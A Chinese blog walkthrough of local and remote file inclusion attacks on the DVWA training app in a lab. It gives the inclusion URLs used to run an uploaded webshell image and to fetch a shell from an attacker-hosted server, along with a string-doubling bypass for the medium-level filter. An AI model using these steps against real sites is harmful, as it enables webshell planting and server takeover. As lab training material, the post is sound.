web安全--文件包含实例操作

文件包含分为LFI(本地文件包含)和RFL(远程文件包含)两种。文件包含的前提是服务器allow_url_openllow_url_include(LFI)或者allow_url_open(RFI)。在owasp环境中可以在/etc/php5/cli/php/ini查看。

同样进入owasp靶机的DVWA

1. 选择进入安全级别为low

2.进入file inclusion查看后端源码,该页面包含了一个include.php,可以尝试将本页面的链接http://192.168.3.94/dvwa/vulnerabilities/fi/?page=include.php   page=后的参数进行替换,e.g./etc/passwd等

 

 3. 制作一句话muma图片或者txt文件

4. 通过文件上传漏洞上传到靶机上,修改链接参数(LFI)

http://192.168.3.94/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/11.jpg

这样muma程序就已经被执行了,到此muma已经生成。查看/dvwa/vulnerabilities/fi/是否生成了muma的php文件。可以通过菜刀链接了 

5. RFI文件上传

开启kali的apache2服务器

systemctl start apache2.servicel/

查看服务器状态

systemctl status apache2.service

开启之后将制作好的muma图片放入服务器路径中,服务器默认路径为/var/www/html/

在本地查看图片 eg 192.168.3.95/11.jpg

6. 回到file inclusion 修改链接,参数改为服务器地址下的文件

http://192.168.3.94/dvwa/vulnerabilities/fi/?page=http://192.168.3.95/11.jpg

到此muma已经生成。查看/dvwa/vulnerabilities/fi/是否生成了muma的php文件

7. 中安全级别过滤处理了http://或者https://特殊字符串。对于LFI来说没有任何的影响,对于RFI来说,只要在http://任何地方插入一个http://。例如htthttp://p://即可。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值